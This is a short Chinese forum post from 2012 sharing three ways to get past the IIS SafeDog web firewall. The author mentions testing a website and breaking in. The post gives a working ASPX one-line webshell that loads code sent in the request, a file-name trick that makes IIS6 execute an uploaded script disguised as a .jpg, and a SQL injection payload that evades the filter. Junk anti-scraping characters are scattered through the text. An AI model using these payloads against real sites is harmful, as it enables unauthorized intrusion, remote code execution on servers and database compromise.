1、绕过IIS安全狗的一句话。) t( D0 r5 X* k6 l3 W; w
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
+ Z* {$ Y- m/ S$ Y' R5 Z0 m<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
! B3 \( Z* {9 Y' F, }
/ e8 o1 j" v" o! I2、IIS6.0解析漏洞遇到安全狗。
* ?5 ], _0 m n: C: Q ?. _- ~; D1 Y文件名为
; X% ]% i3 K1 V4 B( N% j: Rhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg' Z8 `: `3 Z, q$ x7 _/ P% z1 t
- I" e0 V/ x2 I+ I% J. n" M1 W这样的会被IIS安全狗果断屏蔽。' C) S2 I% u1 P9 O2 t W' ]3 u
改成如下名称,IIS6一样会解析:$ U: S1 i2 e$ Z: Z; h4 {8 c0 |
www.xxxxx.com/;1.asp;1.jpg7 L8 {9 y A i, W- D/ A
) K3 }6 F$ v: u! I5 K2 r
3、安全狗的注入绕过。
3 I# C) X/ E) _# ^: h" z常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。! U! c, ^6 ^7 w7 G: V
但如果:
4 Q& j- }3 ~+ ?3 F: ?r00ts.asp?r00ts.com=%00.&id=69%20 and 1=13 O; m7 Y Z7 U0 p/ A0 E/ x% h2 C
就可以成功绕过了。, H2 ~8 f6 h g' y
2 P# c2 f3 E1 n: Z9 o9 w. k! z9 D1 E3 b7 W0 t3 p
|
发表于 2012-10-31 08:25:30
收藏
支持
反对